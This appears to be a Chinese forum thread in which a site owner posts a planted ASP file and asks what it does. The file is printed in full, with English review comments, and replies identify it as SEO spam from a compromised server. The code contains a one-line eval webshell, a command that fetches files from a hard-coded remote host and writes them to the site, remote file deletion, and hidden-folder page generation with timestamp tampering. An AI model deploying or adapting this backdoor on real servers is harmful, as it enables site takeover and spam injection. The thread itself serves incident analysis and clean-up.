根目录下被放置木马!?

oreax 发布于 2014/08/07 15:53

根目录被放置asp程序,首页的htm代码后面多了很多污七八糟的链接

请问这是什么木马?有啥危害(目前仅发现htm页面被加了很多链接)?我的虚拟主机是linux的,没有web程序,仅有一个htm页面,一般是怎么入侵的?通过ftp?

admin_inc_data.asp代码如下:

Hello Manage <%eval request("seo1")%>

test11<%
' NOTE(review): the eval request("seo1") statement on the line above evaluates a
' request-supplied value as VBScript. No authentication is visible, so any client that
' can reach this file can run script with the web application's privileges. Treat the
' file as a backdoor, not just as the source of the injected links.
' NOTE(review): this is classic ASP/VBScript built on Windows COM objects
' (Scripting.FileSystemObject, Adodb.Stream, Shell.Application). The poster describes the
' host as Linux; whether the script can execute there is not shown on this page.







' Raises the script timeout to 1500 seconds, leaving room for the long generation loop below.
Server.ScriptTimeOut = 1500

randomize

' Hard-coded remote host that every GetURL call below contacts. It is a network indicator
' worth searching for in outbound proxy/DNS logs of the web server.
api="http://yanjing.jpshell.com/"

' dqurl: this script's own URL as rebuilt by GetLocationURL; it is sent to the remote host below.
dqurl=GetLocationURL()

' dqml: dqurl with the literal "a.asp" removed; not referenced again in the visible listing.
dqml=Replace(dqurl,"a.asp","") 



' Status probe: when the query string carries zt=1 the script prints a green "ok" banner.
' Presumably a liveness check for whoever planted the file; requests carrying this
' parameter in access logs show the file being polled.
if request.QueryString("zt")="1" then

	response.Write("<div style='margin:0px;background:#00FF00'><center>ok</center></div>")

end if





' Remote fetch-and-write: when id=surl and ppath is non-empty, ppath is split on "@" into a
' source and a destination. The source is fetched from the hard-coded api host and the
' response is written to "./" & destination through savefile.
' NOTE(review): neither part is validated and no authentication is visible, so the request
' decides which remote content lands at which path the web process can write.
' Requests with id=surl in the access log mark each file dropped this way.
If request.QueryString("id")="surl" And request.QueryString("ppath")<>"" Then

	Dim ppath,sour,dest,x_data

	ppath = Split(request.QueryString("ppath"),"@")

	sour = ppath(0)

	' Raises a subscript error when ppath contains no "@"; no error handler is visible at this level.
	dest = ppath(1)



	

	x_data=""

	x_data=GetURL(api&"/"&sour)

	savefile "./"&dest,x_data

End If



' Remote delete: when id=del and ppath is non-empty, deletes the file at the mapped path
' "./" & ppath.
' NOTE(review): the path comes straight from the query string with no validation or
' authentication visible, so any file the web process may delete is exposed. Requests
' with id=del in the access log show what was removed (possibly the operator's own traces).
If request.QueryString("id")="del" And request.QueryString("ppath")<>"" Then

	Set fso = CreateObject("Scripting.FileSystemObject")

	fso.DeleteFile(Server.mappath("./"&request.QueryString("ppath")))

	Set fso = Nothing

End If



' Bulk page generator: when sc=1, writes snum pages (num from the query string, default 50)
' into randomly chosen sub-directories of the site. Page content is pulled from the remote
' api host, and the URL of each new page is reported back to that host.
' For clean-up this means many "<brand>-index.html" files spread over the directories that
' sclx creates, not only the links appended to the home page.
if request.QueryString("sc")="1"  then



	' Number of pages to generate; CLng raises an error on a non-numeric value.
	if request.QueryString("num")<>"" then

		snum=clng(request.QueryString("num"))

	else

		snum=50

	end if

	

	' brand is used as the file-name prefix and forwarded to the remote API; default "omega".
	if request.QueryString("brand") <> "" then 

		brand = request.QueryString("brand")

	else



			brand="omega"

	end if



	' di and gao are forwarded unchanged to the remote API; their meaning is not shown here.
	if request.QueryString("di") <> "" then 

		di = request.QueryString("di")

		else



			di="8"

	end if



	if request.QueryString("gao") <> "" then 

		gao = request.QueryString("gao")

		else



			gao="9"

	end if

	

	ii=0

'fileatt(filepath,filename,filetime,fileshuxing)	

	file_qian = brand&"-"

	while(ii<snum)

		' Picks one of the nine directory patterns in sclx; sclx also creates the folders.
		PATH=sclx(Rand2(1,9))

		'File URL

'		file_qian=GetURL(api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&html=qian")

'		response.Write api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&html=qian"&"<br>"

'		if file_qian<>"" then

'		file_qian = file_qian&"-"

'		else

'		file_qian = brand&"-"

'		end if

		wz_data=""

'		wz_data=GetURL(api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&brand="&brand)

	' Fetches the page body from the remote host, passing this site's host name, the target
	' page URL and this script's own URL. The remote side therefore learns where the
	' script is installed.
	wz_data=GetURL(api&"api/zq_wz_xwq.php?time="&rnd&"&url="&dqurl&"&brand="&brand&"&di="&di&"&gao="&gao&"&htmlurl="&"http://"&Request.ServerVariables("SERVER_NAME")&PATH&file_qian&"index.html&shellurlapi="&dqurl)

		ss=savefile(PATH&file_qian&"index.html",wz_data)

		' Echoes the physical path of each written file, which discloses the server's directory layout.
		response.write Server.MapPath("/")&PATH&file_qian&"index.html"&"<br>"

		' Attribute/timestamp tampering on the new file; see createasa.
		createasa PATH&file_qian&"index.html"

		' Reports the public URL of the new page back to the remote host.
		GetURL(api&"api/zq_bg_url.php?url="&"http://"&Request.ServerVariables("SERVER_NAME")&PATH&file_qian&"index.html&urlapi="&dqurl)

'Server.MapPath("/")&PATH&file_qian&"index.html"

		ii=ii+1

	wend

	

' Completion marker with the server time.
response.Write("over#"&now())



end if



'GetURL(api&"api/zq_bg.php?url="&dqurl)





' GetURL(url): performs a synchronous HTTP GET from the web server to url and returns the
' response body decoded as gb2312 text. When the body is empty the return value is never
' assigned. The HTTP status is not checked and no error handling is present.
' These are outbound requests made by the web server process itself, so egress filtering
' or proxy logging on the server would block or reveal them.
Function GetURL(url) 

Set Retrieval = CreateObject("Microsoft.XMLHTTP") 

With Retrieval 

' Third argument False = synchronous request.
.Open "GET", url, False

.Send 



If Len(.responsebody) > 0 then

	GetURL = BytesToStr(.responsebody,"gb2312")

end if

'GetURL = .responsebody

' This branch is effectively empty: both statements inside it are commented out.
if len(.responsebody)<100 then

	'response.write ""

	'response.end

end if

End With 

Set Retrieval = Nothing 

End Function



' BytesToStr(body, charset): converts a byte array to a string by writing it into an
' Adodb.Stream in binary mode and reading it back as text in the given charset.
Function BytesToStr(body, charset)

    Dim objStream

    Set objStream = Server.CreateObject("Adodb.Stream")

    ' Type 1 = binary, Mode 3 = read/write.
    objStream.Type = 1

    objStream.Mode = 3

    objStream.Open

    objStream.Write body

    ' Rewind, then switch the stream to text (Type 2) so ReadText decodes with charset.
    objStream.Position = 0

    objStream.Type = 2

    objStream.Charset = charset

    BytesToStr = objStream.ReadText 

    objStream.Close

    Set objStream = Nothing

End Function

' GetLocationURL(): rebuilds the URL of the running script as
' "http://" & SERVER_NAME [& ":" & SERVER_PORT when it is not 80] & SCRIPT_NAME.
' The scheme is always "http://", whatever the real request scheme was.
Function GetLocationURL() 

Dim Url 

Dim ServerPort,ServerName,ScriptName,QueryString 

ServerName = Request.ServerVariables("SERVER_NAME") 

ServerPort = Request.ServerVariables("SERVER_PORT") 

ScriptName = Request.ServerVariables("SCRIPT_NAME") 

Url="http://"&ServerName 

If ServerPort <> "80" Then Url = Url & ":" & ServerPort 

Url=Url&ScriptName 

' QueryString is declared above but never assigned in this function, so this branch does
' not add anything in the visible code.
If QueryString <>"" Then Url=Url&"?"& QueryString 

GetLocationURL=Url 

End Function 



' savefile(filename, datas): writes datas as gb2312 text to Server.Mappath(filename),
' overwriting any existing file. No return value is assigned, although one caller stores
' the result.
' NOTE(review): On Error Resume Next hides every failure in this routine, so a missing
' file, a permission error or a failed write produces no visible error.
function savefile(filename,datas)

	On Error Resume Next

	Set fso = Server.CreateObject("scripting.filesystemobject")

	' Clears all attributes on an existing target, presumably so that a read-only file can
	' be overwritten. The lookup uses the unmapped name; a failure is swallowed.
	set f=fso.Getfile(filename)

	f.Attributes = 0

	' The ProgID "adodb.Stream" is assembled from fragments, likely to avoid simple
	' string matching. Scanners should normalise concatenated literals before matching.
	Set Obj = Server.CreateObject("adod" & "b.S" & "tream")

	' Type 2 = text stream.
	Obj.Type = 2

	Obj.open

	Obj.Charset = "gb2312"

	Obj.Position = Obj.Size

	' NOTE(review): WriteText is written as an assignment rather than a call; whether that
	' succeeds cannot be told from this listing, and a failure would be hidden.
	Obj.writetext = datas

	' Option 2 = create or overwrite.
	Obj.SaveToFile  Server.Mappath(filename), 2

'	Obj.SaveToFile  filename, 2

	Obj.Close

	Set Obj = Nothing

	set f=Nothing

	' "file" is never assigned in this routine.
	set file=Nothing

	Set fso = Nothing



end function



' CreateFolder(Folder): maps Folder to a physical path and creates it when it does not
' exist yet. A newly created folder gets attributes 1+2+4+32, which is
' ReadOnly + Hidden + System + Archive. Existing folders are left untouched.
' When hunting for these folders, list the web root with hidden and system entries shown;
' a default directory listing will not display them.
function CreateFolder(Folder)

Dim FsObject

  Dim tmpFolder

  Set FsObject=server.CreateObject("Scripting.FileSystemObject")

  tmpFolder=server.mappath(Folder)

  If Not FsObject.FolderExists(tmpFolder) Then

     FsObject.CreateFolder(tmpFolder)

     Set f = FsObject.GetFolder(tmpFolder)

     f.Attributes=1+2+4+32

  End If

end function



' Rand2(lowerbound, upperbound): returns a pseudo-random integer between lowerbound and
' upperbound inclusive. The generator is reseeded with Randomize on every call.
Function Rand2(lowerbound,upperbound)

Randomize

  Rand2 = Int((upperbound - lowerbound + 1) * Rnd + lowerbound)

end function



' rand3(): returns a 3-character pseudo-random string drawn from 0-9 and A-Z.
' It is used by sclx as the name of the per-page sub-directory, so the generated folders
' have three-character names made of digits and upper-case letters.
function rand3()

	Const cAmount = 36

	Const cCode = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"

	' vCode is declared with upper bound 3, but only indexes 0 to 2 are used.
	Dim vCode(3), vCodes    

	For i=0 To 2    

	 vCode(i) = Int(Rnd * cAmount)    

	 vCodes = vCodes & Mid(cCode, vCode(i)+1, 1)    

	Next    

	rand3 = vCodes    

end function



' sclx(nun): maps a number to a site-relative directory, creates it through CreateFolder,
' appends a random 3-character sub-directory from rand3, creates that too, and returns
' the resulting path with a trailing "/".
' Base directories used: /files/, /css/, /file/, /index/, /images/, /js/, /data/,
' /index/<year>-<month>/ and /html/. The names blend in with ordinary site assets.
' For clean-up, look under each of them for three-character sub-folders holding a
' "<brand>-index.html" file.
function sclx(nun)

	select case nun

		case 1

			strs="/files/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 2

			strs="/css/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs		

		case 3

			strs="/file/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 4

			strs="/index/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 5 

			strs="/images/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 6 

			strs="/js/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 7 

			strs="/data/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs	

		' Case 8 adds a "<year>-<month>" level under /index/ before the random folder.
		case 8

			strs="/index/"

			CreateFolder(strs)

			strs=strs&year(now)&"-"&month(now)&"/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

		case 9 

			strs="/html/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs	

		' Any other value falls back to the same /html/ pattern as case 9.
		case else 

			strs="/html/"

			CreateFolder(strs)

			strs=strs&rand3()&"/"

			CreateFolder(strs)

			sclx=strs

	end select

end function

' createasa(file1): post-processes a file that was just written under the web root. It
' clears the file's attributes, then marks it read-only (Attributes=1), and attempts to
' set its modification date to "12/30/2099 12:30:30".
' NOTE(review): On Error Resume Next hides every failure here, so which steps actually
' take effect cannot be told from the listing.
' Modification times on affected files may have been altered, so they are not a reliable
' basis for a timeline; a far-future date or an unexpected read-only flag is itself an
' indicator.
Function createasa(file1)

	On Error Resume Next

	Dim file2

	file2 = file1

	Set fso = Server.CreateObject("scripting.filesystemobject")

	set f=fso.Getfile(Server.MapPath("/")&file2)

	f.Attributes = 0

	newTime = "12/30/2099 12:30:30"

	' SetFileTime is not defined anywhere in the visible listing.
	SetFileTime(file2)

	set f=fso.Getfile(Server.MapPath("/")&file2)

	f.Attributes=1

'	response.write "锁定文件成功"   (the message reads "file locked successfully")

	Set shell=Server.CreateObject("Shell.Application") 

	Set app_path=shell.NameSpace(server.mappath(".")) 

	' fileName is never assigned in this function (the parameter is file1), so this lookup
	' presumably does not resolve the intended file.
	Set app_file=app_path.ParseName(fileName) 

	app_file.Modifydate=newTime 

	set f=Nothing

	Set fso = Nothing

End Function

%>



leo108

整台服务器被入侵,不是单独针对你的,换个空间商吧。

雨翔河
全被拿下了的节奏。
oreax

引用来自“leo108”的评论

整台服务器被入侵,不是单独针对你的,换个空间商吧。

什么意思?这是什么功能的代码?
卖爷爷的老红薯
看不懂,就没必要去研究了。这些代码,都是为了 seo的目的,而seo的目的是为了赚钱。你既然不是学这门语言的,就算啦。